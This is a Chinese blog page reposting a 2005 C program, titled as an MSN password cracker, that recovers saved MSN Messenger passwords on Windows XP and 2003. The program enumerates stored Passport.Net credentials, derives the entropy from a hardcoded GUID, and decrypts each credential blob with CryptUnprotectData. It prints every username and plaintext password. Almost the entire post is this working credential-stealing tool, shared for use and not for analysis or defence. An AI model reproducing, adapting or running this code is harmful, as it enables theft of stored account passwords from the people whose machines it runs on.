注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

MSN密码破解  

2012-03-29 17:38:02|  分类: 优秀技术文章收集 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
Written by Gregory R. Panakkal    
Wednesday, 17 August 2005

/*
*  MSN Messenger Password Decrypter for Windows XP & 2003
*  (Compiled-VC++ 7.0, tested on WinXP SP2, MSN Messenger 7.0)
*      - Gregory R. Panakkal
*        http://www.crapware.tk/
*        http://www.infogreg.com/
*/

#include <windows.h>
#include <wincrypt.h>
#include <stdio.h>

#pragma comment(lib, "Crypt32.lib")


//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes]

typedef struct _CREDENTIAL_ATTRIBUTEA {
   LPSTR Keyword;
   DWORD Flags;
   DWORD ValueSize;
   LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;

typedef struct _CREDENTIALA {
   DWORD Flags;
   DWORD Type;
   LPSTR TargetName;
   LPSTR Comment;
   FILETIME LastWritten;
   DWORD CredentialBlobSize;
   LPBYTE CredentialBlob;
   DWORD Persist;
   DWORD AttributeCount;
   PCREDENTIAL_ATTRIBUTEA Attributes;
   LPSTR TargetAlias;
   LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;

typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;

////////////////////////////////////////////////////////////////////

typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR, DWORD, DWORD *, PCREDENTIALA **);
typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD, DWORD, PCREDENTIALA *);
typedef VOID (WINAPI *typeCredFree)(PVOID);

typeCredEnumerateA pfCredEnumerateA;
typeCredReadA pfCredReadA;
typeCredFree pfCredFree;

////////////////////////////////////////////////////////////////////

void showBanner()
{
   printf("MSN Messenger Password Decrypter for Windows XP/2003\n");
   printf("   - Gregory R. Panakkal, http://www.infogreg.com \n\n");
}

////////////////////////////////////////////////////////////////////
int main()
{
   PCREDENTIAL *CredentialCollection = NULL;
   DATA_BLOB blobCrypt, blobPlainText, blobEntropy;

   //used for filling up blobEntropy
   char szEntropyStringSeed[37] = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll
   short int EntropyData[37];
   short int tmp;

   HMODULE hDLL;
   DWORD Count, i;

   showBanner();

   //Locate CredEnumerate, CredRead, CredFree from advapi32.dll
   if( hDLL = LoadLibrary("advapi32.dll") )
   {
       pfCredEnumerateA = (typeCredEnumerateA)GetProcAddress(hDLL, "CredEnumerateA");
       pfCredReadA = (typeCredReadA)GetProcAddress(hDLL, "CredReadA");
       pfCredFree = (typeCredFree)GetProcAddress(hDLL, "CredFree");

       if( pfCredEnumerateA == NULL||
           pfCredReadA == NULL ||
           pfCredFree == NULL )
       {
           printf("error!\n");
           return -1;
       }
   }
   

   //Get an array of 'credential', satisfying the filter
   pfCredEnumerateA("Passport.Net\\*", 0, &Count, &CredentialCollection);


   if( Count ) //usually this value is only 1
   {

       //Calculate Entropy Data
       for(i=0; i<37; i++) // strlen(szEntropyStringSeed) = 37
       {
           tmp = (short int)szEntropyStringSeed[i];
           tmp <<= 2;
           EntropyData[i] = tmp;
       }

       for(i=0; i<Count; i++)
       {
           blobEntropy.pbData = (BYTE *)&EntropyData;
           blobEntropy.cbData = 74; //sizeof(EntropyData)

           blobCrypt.pbData = CredentialCollection[i]->CredentialBlob;
           blobCrypt.cbData = CredentialCollection[i]->CredentialBlobSize;

           CryptUnprotectData(&blobCrypt, NULL, &blobEntropy, NULL, NULL, 1, &blobPlainText);
           
           printf("Username : %s\n", CredentialCollection[i]->UserName);
           printf("Password : %ls\n\n", blobPlainText.pbData);
       }
   }

   pfCredFree(CredentialCollection);
}
  评论这张
 
阅读(57)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017